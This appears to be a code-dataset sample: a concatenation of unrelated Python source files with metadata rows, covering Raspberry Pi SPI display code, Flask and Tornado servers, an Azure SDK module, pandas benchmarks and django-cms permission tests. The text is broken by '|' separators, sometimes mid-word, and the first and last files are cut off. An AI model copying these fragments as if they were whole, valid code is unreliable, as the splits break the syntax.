sum += item
sum %= 256
return (0xFF - sum) % 256
spi = spidev.SpiDev()
spi.open(0, 0)
#
# CS+ データ送受信タイミング設定 タイプ1
#
# SCK:  ̄ ̄|_| ̄|_| ̄|_| ̄...
# SOp: 末尾ビット→ <D7> <D6> <D5> ... → 先頭ビット
#
spi.mode = 0
#
# SPIのクロック周波数
# ・500kHz: デフォルト
# ・1MHz: OK
# ・2MHz: NG(データ化け発生)
# ⇒1MHzを設定。
#
spi.max_speed_hz = 1000000
#
#
#
data = [ 0x60, 0xDA, 0x20, 0x10, 0x08, 0x04, 0x02, 0x01, ]
brightness = [ 100, 100, 100, 100, 100, 100, 100, 100, ]
# 1フレーム作成
xfer_data = [ 0x01 ] # タイプ=表示データ
xfer_data.extend(brightness) # 表示データ部
checksum = calc_checksum(xfer_data)
xfer_data.append(checksum)
print xfer_data
#
# RaspberryPiはMSBFirstでしかデータを送信できない。
# (spi.lsbfirstメンバがあるが、Read-Only)
# ⇒送信前にビットを逆転する必
|
要がある。
# [参考URL] http://tightdev.net/Spi
|
Dev_Doc.pdf
#
xfer_data = map(reverse_bit_order, xfer_data)
print xfer_data
# フレーム送信
spi.writebytes(xfer_data)
import os
os.system('sleep 1')
num_to_pattern = [
0xfc, # 0
0x60, # 1
0xda, # 2
0xf2, # 3
0x66, # 4
0xb6, # 5
0xbe, # 6
0xe4, # 7
0xfe, # 8
0xf6, # 9
]
rad = 0.0
while (True):
xfer_data = [ 0x01 ]
brightness[0] = int(math.sin(rad + math.pi/8*0) * 50 + 50)
brightness[1] = int(math.sin(rad + math.pi/8*1) * 50 + 50)
brightness[2] = int(math.sin(rad + math.pi/8*2) * 50 + 50)
brightness[3] = int(math.sin(rad + math.pi/8*3) * 50 + 50)
brightness[4] = int(math.sin(rad + math.pi/8*4) * 50 + 50)
brightness[5] = int(math.sin(rad + math.pi/8*5) * 50 + 50)
brightness[6] = int(math.sin(rad + math.pi/8*6) * 50 + 50)
brightness[7] = int(math.sin(rad + math.pi/8*7) * 50 + 50)
xfer_data.extend(brightness)
checksum = calc_checksum(xfer_data)
xfer_data.append(checksum)
xfer_data = map(reverse_bit_order, xfer_data)
spi.writebytes(xfer_data)
os.system('sleep 0.001')
rad += 0.05 * 2
import datetime as dt
now = dt.datetime.now()
xfer_data = [ 0x00 ]
# data[0] = num_to_pattern[now.year / 1000 % 10]
# data[1] = num_to_pattern[now.year / 100 % 10]
# data[2] = num_to_pattern[now.year / 10 % 10]
# data[3] = num_to_pattern[now.year / 1 % 10]
# data[4] = num_to_pattern[now.month / 10 % 10]
# data[5] = num_to_pattern[now.month / 1 % 10]
# data[6] = num_to_pattern[now.day / 10 % 10]
# data[7] = num_to_pattern[now.day / 1 % 10]
data[0] = num_to_pattern[now.hour / 10 % 10]
data[1] = num_to_pattern[now.hour / 1 % 10]
if (now.microsecond < 500*1000):
data[1] |= 0x01;
data[2] = num_to_pattern[now.minute / 10 % 10]
data[3] = num_to_pattern[now.minute / 1 % 10]
if (now.microsecond < 500*1000):
data[3] |= 0x01;
data[4] = num_to_pattern[now.second / 10 % 10]
data[5] = num_to_pattern[now.second / 1 % 10]
if (now.microsecond < 500*1000):
data[5] |= 0x01;
data[6] = num_to_pattern[now.microsecond / 100000 % 10]
data[7] = num_to_pattern[now.microsecond / 10000 % 10]
# data[4] = num_to_pattern[now.microsecond / 1000 % 10]
# data[5] = num_to_pattern[now.microsecond / 100 % 10]
# data[6] = num_to_pattern[now.microsecond / 10 % 10]
# data[7] = num_to_pattern[now.microsecond / 1 % 10]
xfer_data.extend(data)
checksum = calc_checksum(xfer_data)
xfer_data.append(checksum)
xfer_data = map(reverse_bit_order, xfer_data)
spi.writebytes(xfer_data)
|
vlegoff/tsunami
|
src/secondaires/navigation/equipage/controle.py
|
Python
|
bsd-3-clause
| 5,105
| 0.001191
|
# -*-coding:Utf-8 -*
# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant la méta-classe et la classe abstraite de contrôle."""
from abstraits.obase import BaseObj, MetaBaseObj
controles = {}
class MetaControle(MetaBaseObj):
"""Métaclasse des contrôles.
Elle ajoute le contrôle dans le dictionnaire 'controles' si il possède
une clé.
"""
def __init__(cls, nom, bases, contenu):
"""Constructeur de la métaclasse"""
MetaBaseObj.__init__(cls, nom, bases, contenu)
if cls.cle:
controles[cls.cle] = cls
class Controle(BaseObj, metaclass=MetaControle):
"""Classe représentant un contrôle.
Un contrôle est une classe intermédiaire entre un objectif et une
volonté. Un contrôle permet de spécifier une action continue
paramétrable. Par exemple, un contrôle permet de paramétrer la
vitesse du navire. Si un équipage possède ce contrôle actif,
le commandant (le capitaine ou second PNJ) va décomposer ce contrôle
en ordres après avoir déterminé combien de voiles, en fonction du
vent, doivent être hissées, ainsi que combien de rames doivent être
tenues et à quelle vitesse. Cependant, un contrôle n'est pas
simpelment une volonté enveloppant d'autres volontés : le contrôle
reste actif jusqu'au moment où il sera remplacé. Admettons que le
vent change de direction et que la vitesse se modifie, le contrôle
doit faire en sorte que la vitesse soit rétablie à celle spécifiée.
Contrairement aux objectifs, volontés et ordres, un contrôle est
actif ou inactif sur un navire en fonction de son type. On ne peut
avoir deux contrôles actifs en même temps sur le même navire
précisant que le navire doit aller à 1 noeud et à 2 noeuds. Par
contre, on peut avoir deux
|
contrôles actifs sur le même navire, l'un
|
de type 'vitesse' précisant que le navire doit aller à 1,7 noeuds
et l'autre de type 'direction' précisant que le navire doit maintenir
ce cap.
"""
cle = None
logger = type(importeur).man_logs.get_logger("ordres")
def __init__(self, equipage, *args):
BaseObj.__init__(self)
self.equipage = equipage
self.arguments = args
def __getnewargs__(self):
arguments = (None, ) + tuple(getattr(self, "arguments", ()))
return arguments
def __repr__(self):
return "<Contrôle {}:{} {}>".format(self.cle_navire, self.cle,
self.arguments)
@property
def navire(self):
return self.equipage and self.equipage.navire or None
@property
def cle_navire(self):
navire = self.navire
return navire and navire.cle or "inconnu"
@property
def commandant(self):
"""Retourne le commdnant (PNJ) du navire."""
commandants = self.equipage.get_matelots_au_poste("commandant",
libre=False)
if commandants:
return commandants[0]
return None
def decomposer(self):
"""Décompose le contrôle en volontés.
C'est la méthode la plus importante et celle qui risque de contenir
le plus de code. Elle décompose réellement le contrôle en volontés
(plier 2 voiles, ramer lentement, par exemple).
"""
raise NotImplementedError
def debug(self, message):
"""Log le message précisé en paramètre en ajoutant des informations."""
message = "Contrôle {}:{}, {}".format(self.cle_navire, self.cle,
message)
self.logger.debug(message)
|
TL4/deploy
|
run.py
|
Python
|
mit
| 92
| 0.032609
|
# coding: utf-8
from deploy import app
if
|
__name__ == '__main__':
ap
|
p.run(debug = True)
|
winstonf88/pyjobs
|
pyjobs/app.py
|
Python
|
gpl-2.0
| 750
| 0.001333
|
import logging
import os
import sys
from tornado import
|
ioloop
from tornado import web
from pyjobs import handlers
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
logger = logging.getLogger(__name__)
STATIC_PATH = os.path.join(os.path.dirname(__file__), 'static/')
url_patterns = [
web.url('/', handlers.HomeHandler, name='home'),
web.url('/ws', han
|
dlers.WebSocketHandler),
web.url('/static/(.*)', web.StaticFileHandler, {'path': STATIC_PATH}),
]
settings = {
'compiled_template_cache': False,
}
def server():
logger.info('Serving on port 8888')
application = web.Application(url_patterns, **settings)
application.listen(8888)
ioloop.IOLoop.current().start()
if __name__ == '__main__':
server()
|
Azure/azure-sdk-for-python
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_08_01/aio/operations/_network_interfaces_operations.py
|
Python
|
mit
| 72,800
| 0.004973
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class NetworkInterfacesOperations:
"""NetworkInterfacesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_08_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _delete_initial(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Deletes the specified network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
async def get(
self,
resource_group_name: str,
network_interface_name: str,
expand: Optional[str] = None,
**kwargs: Any
) -> "_models.NetworkInterface":
"""Gets information about the specified network interface.
:param re
|
source_group_name: The name of the re
|
source group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls
|
ARM-software/CMSIS_5
|
CMSIS/DSP/cmsisdsp/sdf/nodes/host/message.py
|
Python
|
apache-2.0
| 3,886
| 0.022131
|
# --------------------------------------------------------------------------
# Copyright (c) 2020-2022 Arm Limited (or its affiliates). All rights reserved.
#
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the License); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an AS IS BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# --------------------------------------------------------------------------
import sys
# VSI KIND
VSIOUTPUT = 0
VSIINPUT = 1
# MESSAGE IDs
CLIENTREADBUF=1
CLIENTWRITEBUF=2
CLIENTSTOP=3
# PACKETSIZE : default number of bytes read on a socket
PACKETSIZE = 1024
# Conersion between size expressed in bytes or in Q15
INTSIZE = 2
# Error raised when trying to read / write to sockets
class ErrorTooMuchDataReceived(Exception):
pass
class CantReceiveData(Exception):
pass
def clientID(inputMode,theID):
return([(theID << 1) | inputMode])
# Receive a given number of bytes
# Socket is read by block of PACKETSIZE
def receiveBytes(conn,nb):
data = b""
while nb > 0:
if nb < PACKETSIZE:
newData = conn.recv(nb)
if not newData: raise CantReceiveData
else:
newData= conn.recv(PACKETSIZE)
if not newData: raise CantReceiveData
nb = nb - len(newData)
if nb < 0:
raise ErrorTooMuchDataReceived
data += newData
return(data)
# Send bytes
def sendBytes(conn,data):
conn.sendall(data)
# Convert a list of Q15 to a bytestream
def list_t
|
o_bytes(l):
return(b"".join([x.to_bytes(INTSIZE,byteorder=sys.byteorder,signed=True) for x in l]))
# Convert a bytestream to a list
|
of Q15
def bytes_to_list(l):
res=[]
i = 0
while(i<len(l)):
res.append(int.from_bytes(l[i:i+INTSIZE],byteorder=sys.byteorder,signed=True))
i = i+INTSIZE
return(res)
# Send a list of Q15
def sendIntList(conn,l):
data = list_to_bytes(l)
sendBytes(conn,data)
# Receive a list of Q15
def getIntList(conn,length):
data = receiveBytes(conn,INTSIZE*length)
return(bytes_to_list(data))
# Low level bytes management
# Return the message ID and the number of bytes expected in the message
def getMsgAndNbOfBytes(data):
msgID = int(data[0])
length= int.from_bytes(data[1:5],byteorder=sys.byteorder,signed=False)
return(msgID,length)
# A client is requesting data from the server. It is the input of VHT
# Client -> Server
def getBufferMsg(conn,nbBytes):
# Ask buffer from server
a=(CLIENTREADBUF).to_bytes(1,byteorder=sys.byteorder)
b=(nbBytes).to_bytes(4,byteorder=sys.byteorder)
msg=a+b
sendBytes(conn,msg)
# Receive buffer from server
data = receiveBytes(conn,nbBytes)
return(data)
# Stop the server when the end of the SDF scheduling has been reached.
# It is to make it easier to end the demo.
# Only the VHT client has to be killed.
# Client -> Server
def stopMsg(conn):
# Send a stop message to server
a=(CLIENTSTOP).to_bytes(1,byteorder=sys.byteorder)
b=(0).to_bytes(4,byteorder=sys.byteorder)
msg=a+b
sendBytes(conn,msg)
# Data in bytes
# A client is sending that some bytes be sent to the server
# It is the output of VHT
# Client -> Server
def writeBufferMsg(conn,theBytes):
# Tell server a buffer is coming
a=(CLIENTWRITEBUF).to_bytes(1,byteorder=sys.byteorder)
nbBytes = len(theBytes)
b=(nbBytes).to_bytes(4,byteorder=sys.byteorder)
msg = a+b+theBytes
# Send message and buffer to server
sendBytes(conn,msg)
|
darren-rogan/CouchPotatoServer
|
libs/flask/views.py
|
Python
|
gpl-3.0
| 5,629
| 0
|
# -*- coding: utf-8 -*-
"""
flask.views
~~~~~~~~~~~
This module provides class-based views inspired by the ones in Django.
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
from .globals import request
http_method_funcs = frozenset(['get', 'post', 'head', 'options',
'delete', 'put', 'trace', 'patch'])
class View(object):
"""Alternative way to use view functions. A subclass has to implement
:meth:`dispatch_request` which is called with the view arguments from
the URL routing system. If :attr:`methods` is provided the methods
do not have to be passed to the :meth:`~flask.Flask.add_url_rule`
method explicitly::
class MyView(View):
methods = ['GET']
def dispatch_request(self, name):
return 'Hello %s!' % name
app.add_url_rule('/hello/<name>', view_func=MyView.as_view('myview'))
When you want to decorate a pluggable view you will have to either do that
when the view function is created (by wrapping the return value of
:meth:`as_view`) or you can use the :attr:`decorators` attribute::
class SecretView(View):
methods = ['GET']
decorators = [superuser_required]
def dispatch_request(self):
...
The decorators stored in the decorators list are applied one after another
when the view function is created. Note that you can *not* use the class
based decorators since those would decorate the view class and not the
generated view function!
"""
#: A for which methods this pluggable view can handle.
methods = None
#: The canonical way to decorate class-based views is to decorate the
#: return value of as_view(). However since this moves parts of the
#: logic from the class declaration to the place where it's hooked
#: into the routing system.
#:
#: You can place one or more decorators in this list and whenever the
#: view function is created the result is automatically decorated.
#:
#: .. versionadded:: 0.8
decorators = []
def dispatch_request(self):
"""Subclasses have to override this method to implement the
actual view function code. This method is called with all
the arguments from the URL rule.
"""
raise NotImplementedError()
@classmethod
def as_view(cls, name, *class_args, **class_kwargs):
"""Converts the class into an actual view function that can be used
with the routing system. Internally this generates a function on the
fly which will instantiate the :class:`View` on each request and call
the :meth:`dispatch_request` method on it.
The arguments passed to :meth:`as_view` are forwarded to the
constructor of the class.
"""
def view(*args, **kwargs):
self = view.view_class(*class_args, **class_kwargs)
return self.dispatch_request(*args, **kwargs)
if cls.decorators:
view.__name__ = name
view.__module__ = cls.__module__
for decorator in cls.decorators:
view = decorator(view)
# we attach the view class to the view function for two reasons:
# first of all it allows us to easily figure out what class-based
# view this thing came from, secondly it's also used for instantiating
# the view class so you can actually replace it with something else
# for testing purposes and debugging.
view.view_class = cls
view.__name__ = name
view.__doc__ = cls.__doc__
view.__module__ = cls.__module__
view.methods = cls.methods
return view
class MethodViewType(type):
def __new__(cls, name, bases, d):
rv = type.__new__(cls, name, bases, d)
if 'methods' not in d:
methods = set(rv.methods or [])
for key, value in d.iteritems():
if key in http_method_funcs:
methods.add(key.upper())
# if we have no method at all in there we don't want to
# add a method list. (This is for instance the case for
# the baseclass or another subclass of a base method view
# that does n
|
ot introduce new methods).
if methods:
rv.methods = sorted(methods)
return rv
class MethodView(View):
"""Like a regular class-based view but that dispatches requests to
particular methods. For instance if you implement a method called
:meth:`get` it means you will respon
|
se to ``'GET'`` requests and
the :meth:`dispatch_request` implementation will automatically
forward your request to that. Also :attr:`options` is set for you
automatically::
class CounterAPI(MethodView):
def get(self):
return session.get('counter', 0)
def post(self):
session['counter'] = session.get('counter', 0) + 1
return 'OK'
app.add_url_rule('/counter', view_func=CounterAPI.as_view('counter'))
"""
__metaclass__ = MethodViewType
def dispatch_request(self, *args, **kwargs):
meth = getattr(self, request.method.lower(), None)
# if the request method is HEAD and we don't have a handler for it
# retry with GET
if meth is None and request.method == 'HEAD':
meth = getattr(self, 'get', None)
assert meth is not None, 'Unimplemented method %r' % request.method
return meth(*args, **kwargs)
|
driftyco/ionitron-issues
|
tests/test_close_old_issue.py
|
Python
|
mit
| 3,578
| 0.006149
|
# python -m unittest discover
import unittest
from datetime import datetime
from tasks import old_issues as c
class TestCloseOldIssue(unittest.TestCase):
def test_is_closed_issue(self):
self.assertEquals(c.is_closed({'closed_at': None}), False)
self.assertEquals(c.is_closed({'closed_at': "2014-10-10T00:09:51Z"}), True)
def test_is_pull_request(self):
self.assertEquals(c.is_pull_request({}), False)
self.assertEquals(c.is_pull_request({'pull_request': {}}), True)
def test_has_milestone(self):
self.assertEquals(c.has_milestone({'milestone': None}), False)
self.assertEquals(c.has_milestone({'milestone': "v1.1"}), True)
def test_is_old_issue(self):
self.assertEquals(c.is_old_issue(datetime(2000, 1, 1), now=datetime(2000, 1, 9), close_inactive_after=10), False)
self.assertEquals(c.is_old_issue(datetime(2000, 1, 1), now=datetime(2000, 1, 11), close_inactive_after=10), False)
self.assertEquals(c.is_old_issue(datetime(2000, 1, 1), now=datetime(2000, 1, 12), close_inactive_after=10), True)
def test_has_labels_preventing_close(self):
self.assertEquals(c.has_labels_preventing_close({
'labels': [{
'name': 'bug'
}]
}, ['in progress', 'ready', 'high priority']), False)
self.assertEquals(c.has_labels_preventing_close({}, ['in progress', 'ready', 'high priority']), False)
self.assertEquals(c.has_labels_preventing_close({ 'labels': [] }, ['in progress', 'ready', 'high priority']), False)
self.assertEquals(c.has_labels_preventing_close({
'labels': [{
'name': 'ready'
}]
}, ['in progress', 'ready', 'high priority']), True)
def test_has_comments_preventing_close(self):
self.assertEquals(c.has_comments_preventing_close({
'comments': None
}, 2), False)
self.assertEquals(c.has_comments_preventing_close({
'comments': 0
}, 2), False)
self.assertEquals(c.has_comments_preventing_close({
'comments': 2
}, 2), False)
self.assertEquals(c.has_comments_preventing_close({
'comments': 3
}, 2), True)
def test_has_assignee_preventing_close(self):
self.assertEquals(c.has_assignee_preventing_close({
'assignee': None
}), False)
self.assertEquals(c.has_assignee_preventing_close({
'assignee': {}
}), False)
self.assertEquals(c.has_assignee_preventing_close({
'assignee': { 'login': 'steve' }
}), True)
def test_has_milestone_preventing_close(self):
self.assertEquals(c.has_milestone_preventing_close({}), False)
self.assertEquals(c.has_milestone_preventing_close({
'milestone': None
}), False)
self.assertEquals(c.has_milestone_preventing_close({
'milestone': {}
}), False)
self.assertEquals(c.has_milestone_preventing_close({
'milestone': { 'url': 'https://api.github.com/repos/octocat/Hello-World/milestones/1' }
}), True)
def test_has_events_preventing_close(self):
self.assertEquals(c.has_events_prevent
|
ing_close(None), False)
self.assertEquals(c.has_events_preventing_close([
{ 'event': 'c
|
losed' },
{ 'event': 'labeled' }
]), False)
self.assertEquals(c.has_events_preventing_close([
{ 'event': 'closed' },
{ 'event': 'referenced' }
]), True)
|
zfrenchee/pandas
|
asv_bench/benchmarks/offset.py
|
Python
|
bsd-3-clause
| 3,276
| 0
|
# -*- coding: utf-8 -*-
from datetime import datetime
import numpy as np
import pandas as pd
try:
import pandas.tseries.holiday # noqa
except ImportError:
pass
hcal = pd.tseries.holiday.USFederalHolidayCalendar()
# These offests currently raise a NotImplimentedError with .apply_index()
non_apply = [pd.offsets.Day(),
pd.offsets.BYearEnd(),
pd.offsets.BYearBegin(),
pd.offsets.BQuarterEnd(),
pd.offsets.BQuarterBegin(),
pd.offsets.BMonthEnd(),
pd.offsets.BMonthBegin(),
pd.offsets.CustomBusinessDay(),
pd.offsets.CustomBusinessDay(calendar=hcal),
pd.offsets.CustomBusinessMonthBegin(calendar=hcal),
pd.offsets.CustomBusinessMonthEnd(calendar=hcal),
pd.offsets.CustomBusinessMonthEnd(calendar=hcal)]
other_offsets = [pd.offsets.YearEnd(), pd.offsets.YearBegin(),
pd.offsets.QuarterEnd(), pd.offsets.QuarterBegin(),
pd.offsets.MonthEnd(), pd.offsets.MonthBegin(),
pd.offsets.DateOffset(months=2, days=2),
pd.offsets.BusinessDay(), pd.offsets.SemiMonthEnd(),
pd.offsets.SemiMonthBegin()]
offsets = non_apply + other_offsets
class ApplyIndex(object):
goal_time = 0.2
params = other_offsets
param_names = ['offset']
def setup(self, offset):
N = 10000
self.rng = pd.date_range(start='1/1/2000', periods=N, freq='T')
def time_apply_index(self, offset):
offset.apply_index(self.rng)
class OnOffset(object):
goal_time = 0.2
params = offsets
param_names = ['offset']
def setup(self, offset):
self.dates = [datetime(2016, m, d)
for m in [10, 11, 12]
for d in [1, 2, 3, 28, 29, 30, 31]
if not (m == 11 and d == 31)]
def time_on_offset(self, offset):
for date in self.dates:
offset.onOffset(date)
class OffsetSeriesArithmetic(object):
goal_time = 0.2
params = offsets
param_names = ['offset']
def setup(self, offset):
N = 1000
rng = pd.date_range(start='1/1/2000', periods=N, freq='T')
self.data = pd.Series(rng)
def time_add_offset(self, offset):
self.data + offset
class OffsetDatetimeIndexArithmetic(object):
goal_time = 0.2
params = offsets
param_names = ['of
|
fset']
def setup(self, offset):
N = 1000
self.data = pd.date_range(start='1/1/2000', periods=N, freq='
|
T')
def time_add_offset(self, offset):
self.data + offset
class OffestDatetimeArithmetic(object):
goal_time = 0.2
params = offsets
param_names = ['offset']
def setup(self, offset):
self.date = datetime(2011, 1, 1)
self.dt64 = np.datetime64('2011-01-01 09:00Z')
def time_apply(self, offset):
offset.apply(self.date)
def time_apply_np_dt64(self, offset):
offset.apply(self.dt64)
def time_add(self, offset):
self.date + offset
def time_add_10(self, offset):
self.date + (10 * offset)
def time_subtract(self, offset):
self.date - offset
def time_subtract_10(self, offset):
self.date - (10 * offset)
|
pebble/spacel-provision
|
src/spacel/provision/app/db/base.py
|
Python
|
mit
| 874
| 0
|
import logging
from spacel.provision.app.base_decorator import BaseTemplateDecorator
logger = logging.getLogger('spacel.provision.app.db')
class BaseDbTemplateDecorator(BaseTemplateDecorator):
def __init__(self, ingress):
sup
|
er(BaseDbTemplateDecorator, self).__init__()
self._ingress = ingress
def _add_client_resources(self, resources, app_region, port, params,
sg_ref):
clients = params.get('clients', ())
|
ingress_resources = self._ingress.ingress_resources(app_region,
port,
clients,
sg_ref=sg_ref)
logger.debug('Adding %s ingress rules.', len(ingress_resources))
resources.update(ingress_resources)
|
czpython/django-cms
|
cms/tests/test_permmod.py
|
Python
|
bsd-3-clause
| 44,347
| 0.001804
|
# -*- coding: utf-8 -*-
from djangocms_text_ckeditor.models import Text
from django.contrib.admin.sites import site
from django.contrib.admin.utils import unquote
from django.contrib.auth import get_user_model
from django.contrib.auth.models import AnonymousUser, Group, Permission
from django.contrib.sites.models import Site
from django.core.management import call_command
from django.core.urlresolvers import reverse
from django.db.models import Q
from django.test.client import RequestFactory
from django.test.utils import override_settings
from django.utils.translation import override as force_language
from cms.api import (add_plugin, assign_user_to_page, create_page,
create_page_user, publish_page)
from cms.admin.forms import save_permissions
from cms.cms_menus import get_visible_nodes
from cms.management.commands.subcommands.moderator import log
from cms.models import Page, CMSPlugin, Title, ACCESS_PAGE
from cms.models.permissionmodels import (ACCESS_DESCENDANTS,
ACCESS_PAGE_AND_DESCENDANTS,
PagePermission,
GlobalPagePermission)
from cms.plugin_pool import plugin_pool
from cms.test_utils.testcases import (URL_CMS_PAGE_ADD, CMSTestCase)
from cms.test_utils.util.context_managers import disable_logger
from cms.test_utils.util.fuzzy_int import FuzzyInt
from cms.utils import get_current_site
from cms.utils.page import get_page_from_path
from cms.utils.page_permissions import user_can_publish_page, user_can_view_page
def fake_tree_attrs(page):
page.depth = 1
page.path = '0001'
page.numchild = 0
@override_settings(CMS_PERMISSION=True)
class PermissionModeratorTests(CMSTestCase):
"""Permissions and moderator together
Fixtures contains 3 users and 1 published page and some other stuff
Users:
1. `super`: superuser
2. `master`: user with permissions to all applications
3. `slave`: user assigned to page `slave-home`
Pages:
1. `home`:
|
- published page
- master can do anything on its subpages, but not on home!
2. `master`:
- published page
- created by super
- `master`
|
can do anything on it and its descendants
- subpages:
3. `slave-home`:
- not published
- assigned slave user which can add/change/delete/
move/publish this page and its descendants
- `master` user want to moderate this page and all descendants
4. `pageA`:
- created by super
- master can add/change/delete on it and descendants
"""
#TODO: Split this test case into one that tests publish functionality, and
#TODO: one that tests permission inheritance. This is too complex.
def setUp(self):
# create super user
